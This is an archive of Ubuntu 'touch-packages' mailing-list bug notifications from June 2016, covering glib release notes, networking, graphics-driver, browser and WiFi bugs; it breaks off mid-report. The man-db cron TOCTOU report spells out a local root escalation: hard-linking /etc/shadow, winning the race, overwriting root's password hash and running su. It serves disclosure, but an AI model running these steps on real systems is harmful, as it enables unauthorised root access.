https://bugs.launchpad.net/bugs/1581439

Title:
  [SRU] New stable release 2.48.1

Status in glib2.0 package in Ubuntu:
  Fix Released
Status in glib2.0 source package in Xenial:
  Fix Committed

Bug description:
  [ Description ]

  Upstream have released a new bugfix release.

  [ Changes ]

  From NEWS:

  Bugs fixed:
   731988 glocalfile: Avoid a potential NULL pointer dereference
   747107 GVariant varargs documentation: g_variant_get() example
   747478 g_system_thread_set_name() is not implemented for gthread-win32
   748474 g_get_language_names() is not thread-safe
   748530 gthread: W32 implementation of g_get_num_processors() has lame 
fallback
   748806 GVariant: Better introduction to the concepts and its uses
   749606 tests: always remove app.desktop
   758174 Fix documentation typos
   758738 Usage of GType properties causes crashes due to gulong/gpointer 
mismatch
   762994 Race condition in GIO/AppFileChooser crashes Firefox/Gtk3
   763379 codegen: Add support for g_autoptr to gdbus-codegen–generated objects
   763821 build: Also dist Systemtap files always for gobject/
   764092 gstrfuncs: Document the behaviour of g_strjoinv()
   764574 build: Fix all statfs() tests failing
   764575 tests: Fix compilation errors due to Y2K format problems
   764685 GApplication documentation about handling command-line options is 
confusing
   764754 '-' in application id: unbreak bus activation and notifications
   765959 socket: set fd field to -1 after closing socket
   765990 Visual Studio: Define inline only when necessary

  Translations updated:
   Basque language
   Catalan
   Vietnamese
   zh_CN

  [ QA, testing, regression potential ]

  Under the GNOME MRE, you can believe all bugs upstream says are fixed
  are really fixed. Just test the system and make sure there are no
  regressions (e.g. look at errors.ubuntu.com).

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/glib2.0/+bug/1581439/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1301015] Re: Networking does not restart

2016-06-04 Thread Ryan Cooper
>Seriously people, get over yourself

There's no need to be rude and condescending, Gabriel. It is possible to
have a disagreement without being a jerk about it.

There's about 100% more keystrokes in:
> `( ifdown -a --exclude=lo; ifup -a --exclude=lo) &` 
vs
> service networking restart

Plus `service networking restart` is much cleaner, easier to type,
memorable, and baked into a considerable number of people's scripts. So
no, we can't move along. This is the definition of a regression, and
it's clear why so many people are bothered by it.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ifupdown in Ubuntu.
https://bugs.launchpad.net/bugs/1301015

Title:
  Networking does not restart

Status in ifupdown package in Ubuntu:
  Confirmed

Bug description:
  In Ubuntu Server 14.04 it appears it is not possible to restart
  networking. This is fresh install from ISO.

  wirehive@ubuntu:~$ sudo /etc/init.d/networking restart
  wirehive@ubuntu:~$ echo $?
  1
  wirehive@ubuntu:~$ sudo service networking restart
  stop: Job failed while stopping
  start: Job is already running: networking
  wirehive@ubuntu:~$ sudo bash -x /etc/init.d/networking restart
  + PATH=/sbin:/bin
  + RUN_DIR=/run/network
  + IFSTATE=/run/network/ifstate
  + STATEDIR=/run/network/state
  + '[' -x /sbin/ifup ']'
  + '[' -x /sbin/ifdown ']'
  + . /lib/lsb/init-functions
  +++ run-parts --lsbsysinit --list /lib/lsb/init-functions.d
  ++ for hook in '$(run-parts --lsbsysinit --list /lib/lsb/init-functions.d 
2>/dev/null)'
  ++ '[' -r /lib/lsb/init-functions.d/20-left-info-blocks ']'
  ++ . /lib/lsb/init-functions.d/20-left-info-blocks
  ++ for hook in '$(run-parts --lsbsysinit --list /lib/lsb/init-functions.d 
2>/dev/null)'
  ++ '[' -r /lib/lsb/init-functions.d/50-ubuntu-logging ']'
  ++ . /lib/lsb/init-functions.d/50-ubuntu-logging
  +++ LOG_DAEMON_MSG=
  ++ FANCYTTY=
  ++ '[' -e /etc/lsb-base-logging.sh ']'
  ++ true
  + CONFIGURE_INTERFACES=yes
  + EXCLUDE_INTERFACES=
  + VERBOSE=no
  + '[' -f /etc/default/networking ']'
  + verbose=
  + '[' no = yes ']'
  + case "$1" in
  + init_is_upstart
  + '[' -x /sbin/initctl ']'
  + /bin/grep -q upstart
  + /sbin/initctl version
  + return 0
  + exit 1
  wirehive@ubuntu:~$ sudo bash -x service networking restart
  ++ basename service
  + VERSION='service ver. 0.91-ubuntu1'
  ++ basename service
  + USAGE='Usage: service < option > | --status-all | [ service_name [ command 
| --full-restart ] ]'
  + SERVICE=
  + ACTION=
  + SERVICEDIR=/etc/init.d
  + OPTIONS=
  + '[' 2 -eq 0 ']'
  + cd /
  + '[' 2 -gt 0 ']'
  + case "${1}" in
  + '[' -z '' -a 2 -eq 1 -a networking = --status-all ']'
  + '[' 2 -eq 2 -a restart = --full-restart ']'
  + '[' -z '' ']'
  + SERVICE=networking
  + shift
  + '[' 1 -gt 0 ']'
  + case "${1}" in
  + '[' -z networking -a 1 -eq 1 -a restart = --status-all ']'
  + '[' 1 -eq 2 -a '' = --full-restart ']'
  + '[' -z networking ']'
  + '[' -z '' ']'
  + ACTION=restart
  + shift
  + '[' 0 -gt 0 ']'
  + '[' -r /etc/init/networking.conf ']'
  + which initctl
  + grep -q upstart
  + initctl version
  + case "${ACTION}" in
  + stop networking
  stop: Job failed while stopping
  + :
  + exec start networking
  start: Job is already running: networking
  wirehive@ubuntu:~$

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ifupdown/+bug/1301015/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1581640] Re: package libpam-systemd:amd64 229-4ubuntu6 failed to install/upgrade: subprocess installed post-installation script returned error exit status 128

2016-06-04 Thread Leszek
Yes, after reboot everything worked.

** Changed in: systemd (Ubuntu)
   Status: Incomplete => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1581640

Title:
  package libpam-systemd:amd64 229-4ubuntu6 failed to install/upgrade:
  subprocess installed post-installation script returned error exit
  status 128

Status in systemd package in Ubuntu:
  Confirmed

Bug description:
  During installation of this package my PC froze and the only way was
  to make reboot after switching to console (GUI was totally frozen)

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: libpam-systemd:amd64 229-4ubuntu6
  ProcVersionSignature: Ubuntu 4.4.0-22.39-generic 4.4.8
  Uname: Linux 4.4.0-22-generic x86_64
  NonfreeKernelModules: nvidia_uvm nvidia
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  Date: Fri May 13 20:14:26 2016
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 128
  InstallationDate: Installed on 2016-02-28 (75 days ago)
  InstallationMedia: Ubuntu-GNOME 16.04 LTS "Xenial Xerus" - Alpha amd64 
(20160225.1)
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1
   apt  1.2.12~ubuntu16.04.1
  SourcePackage: systemd
  Title: package libpam-systemd:amd64 229-4ubuntu6 failed to install/upgrade: 
subprocess installed post-installation script returned error exit status 128
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1581640/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1574732] Re: Regression: Kernel Update in 16.04 from last days renders nvidia driver unusable

2016-06-04 Thread Christopher M. Penalver
** Tags added: bios-outdated-2.40

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1574732

Title:
  Regression: Kernel Update in 16.04 from last days renders nvidia
  driver unusable

Status in shim:
  New
Status in linux package in Ubuntu:
  Confirmed
Status in xorg package in Ubuntu:
  Confirmed

Bug description:
  I am running Ubuntu 16.04 since at least four months, always with the
  nvidia proprietary drivers (installed from the repository). I used
  nvidia-361 for a while with no issues (and i need it for steam
  gaming). However, an update installed on my machine yesterday breaks
  the nvidia drivers. I tried purging the driver, rebooting and
  reinstalling and i tried a newer version for the ubuntu-drivers ppa.
  Nothing helps: With the nvidia driver installed, i get a low-
  resolution login screen, but cannot login due to missing 3d
  acceleration. Running on nouveau works fine.

  This seems very strange to since everything worked until this
  afternoon. Yesterday, i was happily playing games on steam, installed
  some updates and now, my graphics are broken.


  
  $ lspci | grep NVIDIA
  01:00.0 VGA compatible controller: NVIDIA Corporation GM107 [GeForce GTX 750] 
(rev a2)
  01:00.1 Audio device: NVIDIA Corporation Device 0fbc (rev a1)

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: xorg 1:7.7+13ubuntu3
  ProcVersionSignature: Ubuntu 4.4.0-21.37-generic 4.4.6
  Uname: Linux 4.4.0-21-generic x86_64
  .tmp.unity_support_test.0:
   
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CompizPlugins: No value set for 
`/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: compiz
  CompositorUnredirectDriverBlacklist: '(nouveau|Intel).*Mesa 8.0'
  CompositorUnredirectFSW: true
  Date: Mon Apr 25 17:45:12 2016
  DistUpgraded: 2016-03-11 21:34:38,175 DEBUG enabling apt cron job
  DistroCodename: xenial
  DistroVariant: ubuntu
  DkmsStatus:
   bbswitch, 0.8, 4.4.0-21-generic, x86_64: installed
   virtualbox, 5.0.18, 4.4.0-18-generic, x86_64: installed
   virtualbox, 5.0.18, 4.4.0-21-generic, x86_64: installed
  EcryptfsInUse: Yes
  ExtraDebuggingInterest: Yes, if not too technical
  GraphicsCard:
   NVIDIA Corporation GM107 [GeForce GTX 750] [10de:1381] (rev a2) (prog-if 00 
[VGA controller])
 Subsystem: Palit Microsystems Inc. GM107 [GeForce GTX 750] [1569:1381]
  InstallationDate: Installed on 2016-01-05 (110 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Release amd64 (20151021)
  MachineType: To Be Filled By O.E.M. To Be Filled By O.E.M.
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-21-generic.efi.signed 
root=UUID=ed669b2d-c3af-4570-9eb7-2978557208ae ro quiet splash vt.handoff=7
  SourcePackage: xorg
  Symptom: display
  Title: Xorg crash
  UpgradeStatus: Upgraded to xenial on 2016-03-11 (44 days ago)
  dmi.bios.date: 05/18/2015
  dmi.bios.vendor: American Megatrends Inc.
  dmi.bios.version: P2.30
  dmi.board.name: H97 Performance
  dmi.board.vendor: ASRock
  dmi.chassis.asset.tag: To Be Filled By O.E.M.
  dmi.chassis.type: 3
  dmi.chassis.vendor: To Be Filled By O.E.M.
  dmi.chassis.version: To Be Filled By O.E.M.
  dmi.modalias: 
dmi:bvnAmericanMegatrendsInc.:bvrP2.30:bd05/18/2015:svnToBeFilledByO.E.M.:pnToBeFilledByO.E.M.:pvrToBeFilledByO.E.M.:rvnASRock:rnH97Performance:rvr:cvnToBeFilledByO.E.M.:ct3:cvrToBeFilledByO.E.M.:
  dmi.product.name: To Be Filled By O.E.M.
  dmi.product.version: To Be Filled By O.E.M.
  dmi.sys.vendor: To Be Filled By O.E.M.
  version.compiz: compiz 1:0.9.12.2+16.04.20160415-0ubuntu1
  version.ia32-libs: ia32-libs N/A
  version.libdrm2: libdrm2 2.4.67-1
  version.libgl1-mesa-dri: libgl1-mesa-dri 11.2.0-1ubuntu2
  version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A
  version.libgl1-mesa-glx: libgl1-mesa-glx 11.2.0-1ubuntu2
  version.xserver-xorg-core: xserver-xorg-core 2:1.18.3-1ubuntu2
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.1-1ubuntu2
  version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:7.7.0-1
  version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20160325-1ubuntu1
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 
1:1.0.12-1build2
  xserver.bootTime: Mon Apr 25 17:44:29 2016
  xserver.configfile: default
  xserver.logfile: /var/log/Xorg.0.log
  xserver.version: 2:1.18.3-1ubuntu2
  xserver.video_driver: modeset

To manage notifications about this bug go to:
https://bugs.launchpad.net/shim/+bug/1574732/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589130] Re: Unable to fill a formular

2016-06-04 Thread GTriderXC
The funny thing is that i just clicked on the link above and the keyboard 
appeared correctly. It doesn't appear when you use this link:
http://www.tk.de/tk/jetzt-zur-tk/114210

Then you click "1.einfach online antrag ausfullen/jetzt tk mitglied
werden" then you chose "Berufstatige" from the list and then you get a
form that you won't be able to fill in.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to webbrowser-app in Ubuntu.
https://bugs.launchpad.net/bugs/1589130

Title:
  Unable to fill a formular

Status in webbrowser-app package in Ubuntu:
  New

Bug description:
  I just wanted to fill in a form on a web page using my »Tablet« (yes a 
tablet, that means i wanted to use a touchscreen. If i wanted to use a hardware 
keyboard i'd turn my laptop on;-)
  And was unable to write a single letter on this page:

  https://www.tk.de/tk/jetzt-zur-
  tk/mitgliedschaftsantrag/berufstaetige/214420

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/webbrowser-app/+bug/1589130/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589130] [NEW] Unable to fill a formular

2016-06-04 Thread GTriderXC
Public bug reported:

I just wanted to fill in a form on a web page using my »Tablet« (yes a tablet, 
that means i wanted to use a touchscreen. If i wanted to use a hardware 
keyboard i'd turn my laptop on;-)
And was unable to write a single letter on this page:

https://www.tk.de/tk/jetzt-zur-
tk/mitgliedschaftsantrag/berufstaetige/214420

** Affects: webbrowser-app (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to webbrowser-app in Ubuntu.
https://bugs.launchpad.net/bugs/1589130

Title:
  Unable to fill a formular

Status in webbrowser-app package in Ubuntu:
  New

Bug description:
  I just wanted to fill in a form on a web page using my »Tablet« (yes a 
tablet, that means i wanted to use a touchscreen. If i wanted to use a hardware 
keyboard i'd turn my laptop on;-)
  And was unable to write a single letter on this page:

  https://www.tk.de/tk/jetzt-zur-
  tk/mitgliedschaftsantrag/berufstaetige/214420

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/webbrowser-app/+bug/1589130/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 499773] Re: Race with ureadahead can mean that /var/lib/ureadahead/debugfs appears in /etc/mtab

2016-06-04 Thread Jason Wolosonovich
This bug does cause deja-dup to hang if you're backing up system files.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to mountall in Ubuntu.
https://bugs.launchpad.net/bugs/499773

Title:
  Race with ureadahead can mean that /var/lib/ureadahead/debugfs appears
  in /etc/mtab

Status in mountall package in Ubuntu:
  Triaged

Bug description:
  When the system is booted, the mountall process may notice a
  temporarily-mounted file system at /var/lib/ureadahead/debugfs and
  record that fact in /etc/mtab.  Later in the boot process, this file
  system is unmounted, but mountall doesn't record unmounts, so it never
  "forgets" this path when it's unmounted.

  Mountall should if necessary remove this mount from mtab.

  To confirm on your system that it is indeed not really mounted, look for it 
in /proc/self/mountinfo
  Otherwise this may be due to a crash of the ureadahead process during boot.

   original report 

  Binary package hint: ureadahead

  $ mount
  /dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro)
  proc on /proc type proc (rw)
  none on /sys type sysfs (rw,noexec,nosuid,nodev)
  none on /sys/fs/fuse/connections type fusectl (rw)
  none on /sys/kernel/debug type debugfs (rw)
  none on /sys/kernel/security type securityfs (rw)
  udev on /dev type tmpfs (rw,mode=0755)
  none on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
  none on /dev/shm type tmpfs (rw,nosuid,nodev)
  none on /var/run type tmpfs (rw,nosuid,mode=0755)
  none on /var/lock type tmpfs (rw,noexec,nosuid,nodev)
  none on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
  none on /var/lib/ureadahead/debugfs type debugfs (rw)
  /dev/sda6 on /home type ext4 (rw,relatime)
  binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc 
(rw,noexec,nosuid,nodev)
  gvfs-fuse-daemon on /home/hildeb/.gvfs type fuse.gvfs-fuse-daemon 
(rw,nosuid,nodev,user=hildeb)

  /var/lib/ureadahead/debugfs is left lingering around. It's use is
  somewhat limited, since most Ubuntu users are not kernel developers --
  if it's used as intended: http://kerneltrap.org/node/4394

  ProblemType: Bug
  Architecture: amd64
  Date: Wed Dec 23 11:04:11 2009
  DistroRelease: Ubuntu 9.10
  NonfreeKernelModules: nvidia
  Package: ureadahead 0.90.3-2
  ProcEnviron:
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcVersionSignature: Ubuntu 2.6.31-17.54-generic
  SourcePackage: ureadahead
  Uname: Linux 2.6.31-17-generic x86_64

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/mountall/+bug/499773/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-06-04 Thread Marc Deslauriers
** Changed in: apport (Ubuntu)
   Status: Fix Committed => Confirmed

** Changed in: man-db (Ubuntu)
   Status: Fix Committed => Confirmed

** Changed in: pam (Ubuntu)
   Status: Fix Committed => Confirmed

** Changed in: shadow (Ubuntu)
   Status: Fix Committed => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Confirmed
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589126] [NEW] Graphic driver

2016-06-04 Thread Andres Salas Aburto
Public bug reported:

Sometime My monitor screen is rendered

ProblemType: Bug
DistroRelease: Ubuntu 16.04
Package: xorg 1:7.7+13ubuntu3
ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
Uname: Linux 4.4.0-22-generic x86_64
.tmp.unity_support_test.0:
 
ApportVersion: 2.20.1-0ubuntu2.1
Architecture: amd64
CompizPlugins: No value set for 
`/apps/compiz-1/general/screen0/options/active_plugins'
CompositorRunning: None
Date: Sat Jun  4 12:24:27 2016
DistUpgraded: 2016-04-30 15:51:01,849 DEBUG icon theme changed, re-reading
DistroCodename: xenial
DistroVariant: ubuntu
ExtraDebuggingInterest: I just need to know a workaround
GraphicsCard:
 Intel Corporation Haswell-ULT Integrated Graphics Controller [8086:0a16] (rev 
0b) (prog-if 00 [VGA controller])
   Subsystem: Dell Haswell-ULT Integrated Graphics Controller [1028:0651]
InstallationDate: Installed on 2016-03-07 (89 days ago)
InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Release amd64 (20151021)
MachineType: Dell Inc. Inspiron 3442
ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-22-generic 
root=UUID=3c4c623c-165e-491b-8b4c-babf50a5dacf ro quiet splash vt.handoff=7
SourcePackage: xorg
UpgradeStatus: Upgraded to xenial on 2016-04-30 (34 days ago)
dmi.bios.date: 07/13/2015
dmi.bios.vendor: Dell Inc.
dmi.bios.version: A08
dmi.board.name: 021VNN
dmi.board.vendor: Dell Inc.
dmi.board.version: A08
dmi.chassis.type: 8
dmi.chassis.vendor: Dell Inc.
dmi.chassis.version: Not Specified
dmi.modalias: 
dmi:bvnDellInc.:bvrA08:bd07/13/2015:svnDellInc.:pnInspiron3442:pvrNotSpecified:rvnDellInc.:rn021VNN:rvrA08:cvnDellInc.:ct8:cvrNotSpecified:
dmi.product.name: Inspiron 3442
dmi.product.version: Not Specified
dmi.sys.vendor: Dell Inc.
version.compiz: compiz 1:0.9.12.2+16.04.20160526-0ubuntu1
version.ia32-libs: ia32-libs N/A
version.libdrm2: libdrm2 2.4.67-1ubuntu0.16.04.1
version.libgl1-mesa-dri: libgl1-mesa-dri 11.2.0-1ubuntu2
version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A
version.libgl1-mesa-glx: libgl1-mesa-glx 11.2.0-1ubuntu2
version.xserver-xorg-core: xserver-xorg-core 2:1.18.3-1ubuntu2.2
version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.1-1ubuntu2
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:7.7.0-1
version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20160325-1ubuntu1
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.12-1build2
xserver.bootTime: Sat Jun  4 12:03:10 2016
xserver.configfile: default
xserver.errors:
 
xserver.logfile: /var/log/Xorg.0.log
xserver.outputs:
 product id1519 
 vendor BOE
xserver.version: 2:1.18.3-1ubuntu2.2

** Affects: xorg (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug ubuntu xenial

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1589126

Title:
  Graphic driver

Status in xorg package in Ubuntu:
  New

Bug description:
  Sometime My monitor screen is rendered

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: xorg 1:7.7+13ubuntu3
  ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
  Uname: Linux 4.4.0-22-generic x86_64
  .tmp.unity_support_test.0:
   
  ApportVersion: 2.20.1-0ubuntu2.1
  Architecture: amd64
  CompizPlugins: No value set for 
`/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: None
  Date: Sat Jun  4 12:24:27 2016
  DistUpgraded: 2016-04-30 15:51:01,849 DEBUG icon theme changed, re-reading
  DistroCodename: xenial
  DistroVariant: ubuntu
  ExtraDebuggingInterest: I just need to know a workaround
  GraphicsCard:
   Intel Corporation Haswell-ULT Integrated Graphics Controller [8086:0a16] 
(rev 0b) (prog-if 00 [VGA controller])
 Subsystem: Dell Haswell-ULT Integrated Graphics Controller [1028:0651]
  InstallationDate: Installed on 2016-03-07 (89 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Release amd64 (20151021)
  MachineType: Dell Inc. Inspiron 3442
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-22-generic 
root=UUID=3c4c623c-165e-491b-8b4c-babf50a5dacf ro quiet splash vt.handoff=7
  SourcePackage: xorg
  UpgradeStatus: Upgraded to xenial on 2016-04-30 (34 days ago)
  dmi.bios.date: 07/13/2015
  dmi.bios.vendor: Dell Inc.
  dmi.bios.version: A08
  dmi.board.name: 021VNN
  dmi.board.vendor: Dell Inc.
  dmi.board.version: A08
  dmi.chassis.type: 8
  dmi.chassis.vendor: Dell Inc.
  dmi.chassis.version: Not Specified
  dmi.modalias: 
dmi:bvnDellInc.:bvrA08:bd07/13/2015:svnDellInc.:pnInspiron3442:pvrNotSpecified:rvnDellInc.:rn021VNN:rvrA08:cvnDellInc.:ct8:cvrNotSpecified:
  dmi.product.name: Inspiron 3442
  dmi.product.version: Not Specified
  dmi.sys.vendor: Dell Inc.
  version.compiz: compiz 1:0.9.12.2+16.04.20160526-0ubuntu1
  version.ia32-libs: ia32-libs N/A
  version.libdrm2: libdrm2 2.4.67-1ubuntu0.16.04.1
  version.libgl1-mesa-dri: lib

[Touch-packages] [Bug 1589125] [NEW] WiFi does not work after about 1 in 4 suspends

2016-06-04 Thread Phill
Public bug reported:

Steps: Suspend, wait, resume, a few times.

The Network Manager applet shows WiFi is enabled and shows just one or a
handful of WiFi names, they don't include some that are known to be
available and in use on other computers.

Disabling and enabling WiFi does not fix the problem.

Disabling and enabling networking does not fix the problem.

Adding the following does not help:
/etc/pm/config.d/unload_modules 
SUSPEND_MODULES="$SUSPEND_MODULES iwlwifi"

Only workaround which works perfectly and instantly is to run:
sudo service network-manager restart

ProblemType: Bug
DistroRelease: Ubuntu 16.04
Package: network-manager 1.2.0-0ubuntu0.16.04.2
ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
Uname: Linux 4.4.0-22-generic x86_64
ApportVersion: 2.20.1-0ubuntu2.1
Architecture: amd64
CurrentDesktop: Unity
Date: Sat Jun  4 18:18:50 2016
IfupdownConfig:
 # interfaces(5) file used by ifup(8) and ifdown(8)
 auto lo
 iface lo inet loopback
InstallationDate: Installed on 2016-05-30 (4 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
IpRoute:
 default via 192.168.43.1 dev wlp2s0  proto static  metric 600 
 169.254.0.0/16 dev wlp2s0  scope link  metric 1000 
 192.168.43.0/24 dev wlp2s0  proto kernel  scope link  src 192.168.43.89  
metric 600
NetworkManager.state:
 [main]
 NetworkingEnabled=true
 WirelessEnabled=true
 WWANEnabled=true
SourcePackage: network-manager
UpgradeStatus: No upgrade log present (probably fresh install)
nmcli-dev:
 DEVICE  TYPE  STATEDBUS-PATH  
CONNECTION CON-UUID  CON-PATH   

 wlp2s0  wifi  connected/org/freedesktop/NetworkManager/Devices/0  HTC 
Portable Hotspot DF99  c29b59ba-b6ef-49db-b159-75ec21d3f436  
/org/freedesktop/NetworkManager/ActiveConnection/0 
 enp1s0  ethernet  unavailable  /org/freedesktop/NetworkManager/Devices/1  --   
  ----  
   
 lo  loopback  unmanaged/org/freedesktop/NetworkManager/Devices/2  --   
  ----
nmcli-nm: Error: command ['nmcli', '-f', 'all', 'nm'] failed with exit code 2: 
Error: Object 'nm' is unknown, try 'nmcli help'.

** Affects: network-manager (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug xenial

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/1589125

Title:
  WiFi does not work after about 1 in 4  suspends

Status in network-manager package in Ubuntu:
  New

Bug description:
  Steps: Suspend, wait, resume, a few times.

  The Network Manager applet shows WiFi is enabled and shows just one or
  a handful of WiFi names, they don't include some that are known to be
  available and in use on other computers.

  Disabling and enabling WiFi does not fix the problem.

  Disabling and enabling networking does not fix the problem.

  Adding the following does not help:
  /etc/pm/config.d/unload_modules 
  SUSPEND_MODULES="$SUSPEND_MODULES iwlwifi"

  Only workaround which works perfectly and instantly is to run:
  sudo service network-manager restart

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: network-manager 1.2.0-0ubuntu0.16.04.2
  ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
  Uname: Linux 4.4.0-22-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.1
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Sat Jun  4 18:18:50 2016
  IfupdownConfig:
   # interfaces(5) file used by ifup(8) and ifdown(8)
   auto lo
   iface lo inet loopback
  InstallationDate: Installed on 2016-05-30 (4 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  IpRoute:
